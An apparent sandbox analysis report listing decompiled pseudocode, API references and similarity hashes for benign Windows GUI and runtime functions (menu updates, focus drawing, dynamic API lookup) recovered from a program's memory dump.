			E00448AB0(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x49129c; // 0x4927f0
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E00448E34(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E00448E34(_t29) & 0x0000007f) << 0x0000000d) + ((E00448E34(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}

0x00448ab2
0x00448ab5
0x00448ab7
0x00448ac0
0x00448ad7
0x00448ad9
0x00448ae0
0x00448aec
0x00448af0
0x00448afe
0x00448b05
0x00448b09
0x00448b1b
0x00448b20
0x00448b3e
0x00448b42
0x00448b50
0x00448b57
0x00000000
0x00448b5d
0x00448b57
0x00448b20
0x00448b05
0x00448b6a

APIs

GetMenuItemInfoA.USER32 ref: 00448AFE
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 00448B50
DrawMenuBar.USER32(00000000,00000000,00000000,000000FF), ref: 00448B5D

Strings

P, xrefs: 00448AF0

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: ba6573d917332b9c0be5651dfed5df7281952947ac75fbf58c9735fc59c8b2b7
Instruction ID: cfe592187995a5c8c27ed1b21ffff70120c866184a2454854dd83d498c80581e
Opcode Fuzzy Hash: ba6573d917332b9c0be5651dfed5df7281952947ac75fbf58c9735fc59c8b2b7
Instruction Fuzzy Hash: DE119D70605200AFE3109F28CC81B5A7AD4EB84358F14866EF098DB3D5CA79DC85C64A

Uniqueness

Uniqueness Score: -1.00%

Function 004264A8, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E004264A8(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x426571);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x492a2c =  *0x492a2c + 1;
				if( *0x492a2c == 0) {
					_t3 =  *0x492a84; // 0x24106d0
					E004035DC(_t3);
					_t5 =  *0x476784; // 0x0
					E004035DC(_t5);
					_t7 =  *0x476780; // 0x0
					E004035DC(_t7);
					E004234DC(__ebx, _t27);
					_t10 =  *0x476788; // 0x24106f4
					E004035DC(_t10);
					_t12 =  *0x492a80; // 0x2410730
					E004035DC(_t12);
					_t14 =  *0x492a74; // 0x2410658
					E004035DC(_t14);
					_t16 =  *0x492a78; // 0x2410680
					E004035DC(_t16);
					_t18 =  *0x492a7c; // 0x24106a8
					E004035DC(_t18);
					_t20 =  *0x492a28; // 0xc20806be
					DeleteObject(_t20);
					_push(0x492a44);
					L004068A4();
					_push(0x492a5c);
					L004068A4();
					_t34 =  *0x412b34; // 0x412b38
					E00404E28(0x4766a0, 0x12, _t34);
					_t35 =  *0x412b34; // 0x412b38
					E00404E28(0x476518, 0x31, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x426578);
				return 0;
			}

0x004264a8
0x004264ad
0x004264ae
0x004264b3
0x004264b6
0x004264b9
0x004264bf
0x004264c5
0x004264ca
0x004264cf
0x004264d4
0x004264d9
0x004264de
0x004264e3
0x004264e8
0x004264ed
0x004264f2
0x004264f7
0x004264fc
0x00426501
0x00426506
0x0042650b
0x00426510
0x00426515
0x0042651a
0x00426520
0x00426525
0x0042652a
0x0042652f
0x00426534
0x00426543
0x00426549
0x00426558
0x0042655e
0x0042655e
0x00426565
0x00426568
0x0042656b
0x00426570

APIs

DeleteObject.GDI32(C20806BE), ref: 00426520
RtlDeleteCriticalSection.KERNEL32(00492A44,C20806BE,00000000,00426571), ref: 0042652A
RtlDeleteCriticalSection.KERNEL32(00492A5C,00492A44,C20806BE,00000000,00426571), ref: 00426534

Strings

8+A, xrefs: 00426543, 00426558

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Delete$CriticalSection$Object
String ID: 8+A
API String ID: 378701848-2727534933
Opcode ID: f015d21b22477912e6f5e73b3d2f447c5391d7f240376e9a0d997c50e50c4408
Instruction ID: 202c77e7a0c7c83f8ca4daaa98a883a19753f7ddcfdda9886c7b9d40ed037a6c
Opcode Fuzzy Hash: f015d21b22477912e6f5e73b3d2f447c5391d7f240376e9a0d997c50e50c4408
Instruction Fuzzy Hash: A50109723005047FD625BF26EE429193BA9EB44309392443BB408A76B2CABCED52CB5C

Uniqueness

Uniqueness Score: -1.00%

Function 0042742C, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E0042742C(intOrPtr _a4, intOrPtr _a8, signed int _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t15;
				void* _t16;
				intOrPtr _t18;
				signed int _t19;
				void* _t20;
				intOrPtr _t21;

				_t19 = _a12;
				if( *0x492ac7 != 0) {
					_t16 = 0;
					if((_t19 & 0x00000003) != 0) {
						L7:
						_t16 = 0x12340042;
					} else {
						_t21 = _a4;
						if(_t21 >= 0 && _t21 < GetSystemMetrics(0) && _a8 >= 0 && GetSystemMetrics(1) > _a8) {
							goto L7;
						}
					}
				} else {
					_t18 =  *0x492aa8; // 0x42742c
					 *0x492aa8 = E00427194(3, _t15, _t18, _t19, _t20);
					_t16 =  *0x492aa8(_a4, _a8, _t19);
				}
				return _t16;
			}

0x00427432
0x0042743c
0x00427466
0x0042746f
0x00427497
0x00427497
0x00427471
0x00427471
0x00427476
0x00000000
0x00000000
0x00427476
0x0042743e
0x00427443
0x00427450
0x00427462
0x00427462
0x004274a2

APIs

GetSystemMetrics.USER32 ref: 0042747A
GetSystemMetrics.USER32 ref: 0042748C

Part of subcall function 00427194: GetProcAddress.KERNEL32(745C0000,00000000), ref: 00427214

Strings

MonitorFromPoint, xrefs: 0042743E
,tB, xrefs: 00427443, 00427450, 0042745C

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsSystem$AddressProc
String ID: ,tB$MonitorFromPoint
API String ID: 1792783759-1712981672
Opcode ID: d1eaed9f57635eedea0ffe6d8fe66eb31ee7e96fde009f1834cff5b44424e2e1
Instruction ID: fd0bdc76ba2c9c772aa9b2bc5317b54d86d60807665b21432e5bed67e800e2ef
Opcode Fuzzy Hash: d1eaed9f57635eedea0ffe6d8fe66eb31ee7e96fde009f1834cff5b44424e2e1
Instruction Fuzzy Hash: 1D016732305224FFDB10AF55ED44B5A7F56EB54764F908037F90487652C3B89D4187AC

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3F4, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040B3F4() {
				_Unknown_base(*)()* _t1;
				struct HINSTANCE__* _t3;

				_t1 = GetModuleHandleA("kernel32.dll");
				_t3 = _t1;
				if(_t3 != 0) {
					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
					 *0x4760e4 = _t1;
				}
				if( *0x4760e4 == 0) {
					 *0x4760e4 = E00408B60;
					return E00408B60;
				}
				return _t1;
			}

0x0040b3fa
0x0040b3ff
0x0040b403
0x0040b40b
0x0040b410
0x0040b410
0x0040b41c
0x0040b423
0x00000000
0x0040b423
0x0040b429

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C0CD,00000000,0040C0E0), ref: 0040B3FA
GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0040B40B

Strings

GetDiskFreeSpaceExA, xrefs: 0040B405
kernel32.dll, xrefs: 0040B3F5

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExA$kernel32.dll
API String ID: 1646373207-3712701948
Opcode ID: c56ea8fbd26fb46fb1fc0b81d0cb4dff8a382f1104e53f3b639e698f0638967a
Instruction ID: d3bd04d6302a56580ccfc2d28a3835f024593f99f405b7cd70c95abbfcc9cd06
Opcode Fuzzy Hash: c56ea8fbd26fb46fb1fc0b81d0cb4dff8a382f1104e53f3b639e698f0638967a
Instruction Fuzzy Hash: A3D05EB0A017514AD700FBB159D17662595C750704F41843BB106752C3D77C8998439C

Uniqueness

Uniqueness Score: -1.00%

Function 00426980, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 13
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00426980() {
				struct HINSTANCE__* _t1;
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;

				if( *0x492a94 == 0) {
					_t1 = GetModuleHandleA("comctl32.dll");
					 *0x492a94 = _t1;
					if( *0x492a94 != 0) {
						_t2 =  *0x492a94; // 0x0
						_t3 = GetProcAddress(_t2, "InitCommonControlsEx");
						 *0x492a98 = _t3;
						return _t3;
					}
				}
				return _t1;
			}

0x00426987
0x0042698e
0x00426993
0x0042699f
0x004269a6
0x004269ac
0x004269b1
0x00000000
0x004269b1
0x0042699f
0x004269b6

APIs

GetModuleHandleA.KERNEL32(comctl32.dll,004269F1,00000200,0046920A), ref: 0042698E
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004269AC

Strings

comctl32.dll, xrefs: 00426989
InitCommonControlsEx, xrefs: 004269A1

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: InitCommonControlsEx$comctl32.dll
API String ID: 1646373207-802336580
Opcode ID: b4e1c1f1a313d6417313857fdb522ebdf0dc22661366f020aa2a879659217c54
Instruction ID: 4117415445c2b2d2fd07e8e7d79381c66bde265d186aac133dcfd91a3ead421d
Opcode Fuzzy Hash: b4e1c1f1a313d6417313857fdb522ebdf0dc22661366f020aa2a879659217c54
Instruction Fuzzy Hash: 69D09EF6A01232EAE734EFA6BB4671537945724745F52043BA04956AB5CAFC14C8C70C

Uniqueness

Uniqueness Score: -1.00%

Function 00463630, Relevance: 6.2, APIs: 4, Instructions: 225
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00463630(char __eax, intOrPtr __ecx, void* __edx, void* _a8) {
				char _v8;
				intOrPtr _v12;
				struct tagRECT _v28;
				intOrPtr _v32;
				struct HWND__* _v36;
				signed short _v38;
				char _v39;
				char _v40;
				signed int _v52;
				void* __edi;
				void* __ebp;
				void* _t93;
				struct HWND__* _t94;
				signed int _t99;
				signed int _t100;
				signed int _t123;
				struct HWND__* _t125;
				signed int _t127;
				signed int _t129;
				void* _t131;
				struct HWND__* _t144;
				struct HWND__* _t145;
				intOrPtr _t148;
				void* _t152;
				struct HWND__* _t153;
				intOrPtr _t155;
				intOrPtr _t159;
				struct HWND__* _t196;
				struct HWND__* _t200;
				long _t209;
				struct HWND__** _t212;
				void* _t213;

				_t180 = __ecx;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v32 = __ecx;
				_v8 = __eax;
				_t212 =  &_v8;
				_t93 = E00460DC4( *((intOrPtr*)( *_t212 + 0x29c)));
				_t214 =  *((intOrPtr*)(_t93 + 8));
				if( *((intOrPtr*)(_t93 + 8)) == 0) {
					E0041FBEC( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), __ecx,  *((intOrPtr*)( *_t212 + 0x70)),  &_v28, _t213, _t214);
					return E00420284( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
				}
				_t94 =  *_t212;
				__eflags =  *((char*)(_t94 + 0x2e8)) - 1;
				if( *((char*)(_t94 + 0x2e8)) != 1) {
					L10:
					_t209 = _v28.left;
					_v36 = E00463198( *_t212, _v32);
					_t99 = _v28.bottom - _v28.top -  *((intOrPtr*)( *_t212 + 0x2b0));
					__eflags = _t99;
					_t100 = _t99 >> 1;
					if(__eflags < 0) {
						asm("adc eax, 0x0");
					}
					_v52 = _t100;
					_t173 =  *((intOrPtr*)( *_t212 + 0x208));
					E00420600( *((intOrPtr*)( *_t212 + 0x208)));
					E0041FBEC( *((intOrPtr*)( *((intOrPtr*)( *_t212 + 0x208)) + 0x14)), _t180,  *((intOrPtr*)( *_t212 + 0x70)), _t209, _t213, __eflags);
					E00420284( *((intOrPtr*)( *_t212 + 0x208)),  &_v28);
					_v12 = E00420540(_t173,  *((intOrPtr*)(_v36 + 8))) + 1;
					__eflags =  *( *_t212 + 0x22c) - _v32;
					if(__eflags == 0) {
						E0041FBEC( *((intOrPtr*)(_t173 + 0x14)), _t180, 0x8000000d, _t209, _t213, __eflags);
						E0041F400( *((intOrPtr*)(_t173 + 0xc)), 0x8000000e);
					}
					_v40 =  *((intOrPtr*)(_v36 + 0x18));
					_v39 = E0046179C(_v36);
					_v38 = E00460EB0(_v36);
					_t123 =  *( *_t212 + 0x2e0) & 0x000000ff;
					__eflags = _t123 - 5;
					if(__eflags > 0) {
						L22:
						_t125 =  *( *_t212 + 0x22c);
						__eflags = _t125 - _v32;
						if(_t125 != _v32) {
							goto L35;
						}
						_t125 = _v36;
						__eflags =  *(_t125 + 8);
						if( *(_t125 + 8) == 0) {
							goto L35;
						}
						_t127 =  *( *_t212 + 0x234);
						_v28.left = _t209 + _t127 * ((_v38 & 0x0000ffff) - 1);
						_t196 =  *_t212;
						__eflags =  *((char*)(_t196 + 0x2e0)) - 4;
						if( *((char*)(_t196 + 0x2e0)) >= 4) {
							_v28.left = _v28.left - _v52;
							_t200 =  *_t212;
							__eflags =  *(_t200 + 0x2e9) & 0x00000001;
							if(( *(_t200 + 0x2e9) & 0x00000001) != 0) {
								_t76 =  &_v28;
								 *_t76 = _v28.left + _t127;
								__eflags =  *_t76;
							}
						}
						_t129 =  *( *_t212 + 0x2e0);
						__eflags = _t129;
						if(_t129 != 0) {
							__eflags = _t129 - 4;
							if(_t129 != 4) {
								_t80 =  &_v28;
								 *_t80 = _v28.left +  *( *_t212 + 0x234);
								__eflags =  *_t80;
							}
						}
						__eflags = _t129 - 3;
						if(_t129 == 3) {
							_t83 =  &_v28;
							 *_t83 = _v28.left +  *( *_t212 + 0x234);
							__eflags =  *_t83;
						}
						_t131 = E0043C1F4( *_t212);
						_t125 = GetFocus();
						__eflags = _t131 - _t125;
						if(_t131 != _t125) {
							goto L35;
						} else {
							_t125 =  *_t212;
							__eflags =  *(_t125 + 0x2e9) & 0x00000002;
							if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
								goto L35;
							}
							return DrawFocusRect(E00420704( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
						}
					} else {
						switch( *((intOrPtr*)(_t123 * 4 +  &M00463810))) {
							case 0:
								E00463208(_t213);
								goto L22;
							case 1:
								__eax = E00463414(__edi, __esi, __ebp);
								goto L22;
							case 2:
								__eax = E00463364(__edi, __ebp);
								goto L22;
							case 3:
								__eax = E00463258(__edi, __esi, __ebp);
								goto L22;
							case 4:
								__eax = E004634C4(__edi, __esi, __eflags, __ebp);
								goto L22;
							case 5:
								__eax = E0046354C(__edi, __eflags, __ebp);
								goto L22;
						}
					}
				} else {
					_t144 =  *_t212;
					__eflags =  *((short*)(_t144 + 0x2f2));
					if( *((short*)(_t144 + 0x2f2)) == 0) {
						goto L10;
					}
					_t145 =  *_t212;
					__eflags =  *((intOrPtr*)(_t145 + 0x22c)) - _v32;
					if( *((intOrPtr*)(_t145 + 0x22c)) != _v32) {
						_t148 =  *0x463920; // 0x0
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t148,  &_v28);
					}
					_t152 = E0043C1F4( *_t212);
					_t153 = GetFocus();
					__eflags = _t152 - _t153;
					if(_t152 != _t153) {
						_t155 =  *0x46391c; // 0x1
						return  *((intOrPtr*)( *_t212 + 0x2f0))(_t155,  &_v28);
					}
					_t159 =  *0x463918; // 0x11
					 *((intOrPtr*)( *_t212 + 0x2f0))(_t159,  &_v28);
					_t125 =  *_t212;
					__eflags =  *(_t125 + 0x2e9) & 0x00000002;
					if(( *(_t125 + 0x2e9) & 0x00000002) == 0) {
						L35:
						return _t125;
					}
					return DrawFocusRect(E00420704( *((intOrPtr*)( *_t212 + 0x208))),  &_v28);
				}
			}

0x00463630
0x0046363f
0x00463640
0x00463641
0x00463642
0x00463643
0x00463646
0x00463649
0x00463654
0x00463659
0x0046365d
0x0046366f
0x00000000
0x00463679
0x00463683
0x00463685
0x0046368c
0x00463750
0x00463750
0x0046375d
0x00463768
0x00463768
0x0046376e
0x00463770
0x00463772
0x00463772
0x00463775
0x0046377a
0x00463787
0x00463794
0x0046379e
0x004637b1
0x004637bc
0x004637bf
0x004637c9
0x004637d6
0x004637d6
0x004637e1
0x004637ec
0x004637f7
0x004637fd
0x00463804
0x00463807
0x0046385c
0x0046385e
0x00463864
0x00463867
0x00000000
0x00000000
0x0046386d
0x00463870
0x00463874
0x00000000
0x00000000
0x0046387c
0x0046388e
0x00463891
0x00463893
0x0046389a
0x0046389f
0x004638a2
0x004638a4
0x004638ab
0x004638ad
0x004638ad
0x004638ad
0x004638ad
0x004638ab
0x004638b2
0x004638b8
0x004638ba
0x004638bc
0x004638be
0x004638c8
0x004638c8
0x004638c8
0x004638c8
0x004638be
0x004638cb
0x004638cd
0x004638d7
0x004638d7
0x004638d7
0x004638d7
0x004638dc
0x004638e3
0x004638e8
0x004638ea
0x00000000
0x004638ec
0x004638ec
0x004638ee
0x004638f5
0x00000000
0x00000000
0x00000000
0x00463909
0x00463809
0x00463809
0x00000000
0x00463829
0x00000000
0x00000000
0x00463832
0x00000000
0x00000000
0x00463844
0x00000000
0x00000000
0x0046383b
0x00000000
0x00000000
0x0046384d
0x00000000
0x00000000
0x00463856
0x00000000
0x00000000
0x00463809
0x00463692
0x00463692
0x00463694
0x0046369c
0x00000000
0x00000000
0x004636a2
0x004636aa
0x004636ad
0x00463731
0x00000000
0x00463745
0x004636b1
0x004636b8
0x004636bd
0x004636bf
0x0046370e
0x00000000
0x00463722
0x004636c5
0x004636d9
0x004636df
0x004636e1
0x004636e8
0x00463914
0x00463914
0x00463914
0x00000000
0x00463700

APIs

GetFocus.USER32 ref: 004636B8
DrawFocusRect.USER32 ref: 00463700

Part of subcall function 00420284: FillRect.USER32 ref: 004202AC

Memory Dump Source

Source File: 00000000.00000002.680357780.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.680351788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.680435178.0000000000476000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680440284.0000000000477000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680446750.0000000000490000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.680451894.0000000000492000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.680458716.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: FocusRect$DrawFill
String ID:
API String ID: 3476037706-0
Opcode ID: 17622818a8ca401a56829176c6bff68d395b0500457bed29f907a92299647d46
Instruction ID: 6163be331cae4e77df5b0a99f9786b18ed1cade0b67658f7b256ceccc7b46225
Opcode Fuzzy Hash: 17622818a8ca401a56829176c6bff68d395b0500457bed29f907a92299647d46
Instruction Fuzzy Hash: FC917C74A00149CFCB10EF58C485AAAB7F5BF08315F2444BAE9849B353E738ED85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0042C838, Relevance: 6.2, APIs: 4, Instructions: 224
windowCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0042C838(intOrPtr __eax, void* __ebx, char* __edx, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				long _t97;
				void* _t101;
				intOrPtr _t104;
				void* _t109;
				char _t118;
				long _t135;
				void* _t145;
				intOrPtr _t146;
				char _t148;
				intOrPtr _t152;
				char _t154;
				char _t161;
				void* _t169;
				char _t172;
				char _t174;
				char* _t186;
				void* _t187;
				intOrPtr _t202;
				intOrPtr _t207;
				intOrPtr _t238;
				intOrPtr _t239;

				_t233 = __esi;
				_t238 = _t239;
				_t187 = 7;
				do {
					_push(0);
					_push(0);
					_t187 = _t187 - 1;
				} while (_t187 != 0);
				_push(__ebx);
				_push(__esi);
				_t186 = __edx;
				_v8 = __eax;
				_push(_t238);
				_push(0x42cb2d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t239;
				E0043B224(_v8, __edx);
				if( *((char*)(_v8 + 0x268)) == 0) {
					L30:
					_pop(_t202);
					 *[fs:eax] = _t202;
					_push(0x42cb34);
					E0040436C( &_v60, 4);
					E00404348( &_v44);
					E0040436C( &_v40, 2);
					E0040436C( &_v32, 2);
					return E0040436C( &_v24, 2);
				} else {
					if( *((intOrPtr*)(_v8 + 0x276)) - 2 >= 0) {
						_t97 = GetTickCount();
						_t207 = _v8;
						__eflags = _t97 -  *((intOrPtr*)(_t207 + 0x26c)) - 0x1f4;
						if(_t97 -  *((intOrPtr*)(_t207 + 0x26c)) >= 0x1f4) {
							__eflags = _v8 + 0x270;
							E00404348(_v8 + 0x270);
						}
						 *((intOrPtr*)(_v8 + 0x26c)) = GetTickCount();
					} else {
						E00435B74(_v8,  &_v28);
						E0040439C(_v8 + 0x270, _v28);
					}
					_t101 =  *_t186 - 8;
					if(_t101 == 0) {
						__eflags = E0042C744( &_v12,  &_v16, _t238);
						if(__eflags == 0) {
							_t104 = _v8;
							__eflags =  *((intOrPtr*)(_t104 + 0x276)) - 2;
							if( *((intOrPtr*)(_t104 + 0x276)) - 2 >= 0) {
								L20:
								_t109 = E00404600( *((intOrPtr*)(_v8 + 0x270)));
								__eflags = _v8 + 0x270;
								E00404898(_v8 + 0x270, 1, _t109);
								L21:
								 *_t186 = 0;
								E004037D8(_v8, __eflags);
								goto L30;
							}
							E00435B74(_v8,  &_v32);
							_t118 = E00404600(_v32);
							__eflags = _t118;
							if(_t118 <= 0) {
								goto L20;
							}
							E00435B74(_v8,  &_v24);
							E00404858(_v24, _v12 - 1, 1,  &_v20);
							SendMessageA(E0043C1F4(_v8), 0x14e, 0xffffffff, 0);
							E00404858(_v24, 0x7fffffff, _v16 + 1,  &_v40);
							E0040464C( &_v36, _v40, _v20);
							E00435BA4(_v8, _t186, _v36, _t233);
							_t135 = E00407314();
							SendMessageA(E0043C1F4(_v8), 0x142, 0, _t135);
							E00435B74(_v8,  &_v44);
							E0040439C(_v8 + 0x270, _v44);
							goto L21;
						}
						E0042C770(_t186, _t233, __eflags, _t238);
						goto L21;
					} else {
						_t145 = _t101 - 1;
						if(_t145 == 0) {
							_t146 = _v8;
							__eflags =  *((char*)(_t146 + 0x269));
							if( *((char*)(_t146 + 0x269)) != 0) {
								_t148 = E0042B758(_v8);
								__eflags = _t148;
								if(_t148 != 0) {
									E0042B77C(_v8, 0);
								}
							}
						} else {
							if(_t145 != 0x12) {
								_t152 = _v8;
								__eflags =  *((char*)(_t152 + 0x269));
								if( *((char*)(_t152 + 0x269)) != 0) {
									_t174 = E0042B758(_v8);
									__eflags = _t174;
									if(_t174 == 0) {
										E0042B77C(_v8, 1);
									}
								}
								_t154 = E0042C744( &_v12,  &_v16, _t238);
								__eflags = _t154;
								if(_t154 == 0) {
									E00404528();
									E0040464C( &_v56, _v60,  *((intOrPtr*)(_v8 + 0x270)));
									_t161 = E0042CB3C(_v8, _t186, _v56, _t233);
									__eflags = _t161;
									if(_t161 != 0) {
										 *_t186 = 0;
									}
								} else {
									E00404858( *((intOrPtr*)(_v8 + 0x270)), _v12, 1,  &_v48);
									_push( &_v48);
									E00404528();
									_pop(_t169);
									E00404608(_t169, _v52);
									_t172 = E0042CB3C(_v8, _t186, _v48, _t233);
									__eflags = _t172;
									if(_t172 != 0) {
										 *_t186 = 0;
									}
								}
							}
						}
						goto L30;
					}
				}
			}

0x0042c838
0x0042c839
0x0042c83b
0x0042c840
0x0042c840
0x0042c842
0x0042c844
0x0042c844
0x0042c847
0x0042c848
0x0042c849
0x0042c84b
0x0042c850
0x0042c851
0x0042c856
0x0042c859
0x0042c861
0x0042c870
0x0042cae3
0x0042cae5
0x0042cae8
0x0042caeb
0x0042caf8
0x0042cb00
0x0042cb0d
0x0042cb1a
0x0042cb2c
0x0042c876
0x0042c881
0x0042c8a0
0x0042c8a5
0x0042c8ae
0x0042c8b3
0x0042c8b8
0x0042c8bd
0x0042c8bd
0x0042c8ca
0x0042c883
0x0042c889
0x0042c899
0x0042c899
0x0042c8d2
0x0042c8d4
0x0042c923
0x0042c925
0x0042c933
0x0042c93c
0x0042c93e
0x0042ca05
0x0042ca0e
0x0042ca18
0x0042ca22
0x0042ca27
0x0042ca27
0x0042ca31
0x00000000
0x0042ca31
0x0042c94a
0x0042c952
0x0042c957
0x0042c959
0x00000000
0x00000000
0x0042c965
0x0042c97a
0x0042c991
0x0042c9a6
0x0042c9b4
0x0042c9bf
0x0042c9cd
0x0042c9e3
0x0042c9ee
0x0042c9fe
0x00000000
0x0042c9fe
0x0042c928
0x00000000
0x0042c8d6
0x0042c8d6
0x0042c8d8
0x0042c8e7
0x0042c8ea
0x0042c8f1
0x0042c8fa
0x0042c8ff
0x0042c901
0x0042c90c
0x0042c90c
0x0042c901
0x0042c8da
0x0042c8dc
0x0042ca3b
0x0042ca3e
0x0042ca45
0x0042ca4a
0x0042ca4f
0x0042ca51
0x0042ca58
0x0042ca58
0x0042ca51
0x0042ca64
0x0042ca6a
0x0042ca6c
0x0042cab8
0x0042cacc
0x0042cad7
0x0042cadc
0x0042cade
0x0042cae0
0x0042cae0
0x0042ca6e
0x0042ca83
0x0042ca8b
0x0042ca91
0x0042ca99
0x0042ca9a
0x0042caa5
0x0042caaa
0x0042caac
0x0042caae
0x0042caae
0x0042caac
0x0042ca6c
0x0042c8dc
0x00000000
0x0042c8d8
0x0042c8d4

APIs

GetTickCount.KERNEL32 ref: 0042C8A0
GetTickCount.KERNEL32 ref: 0042C8C2

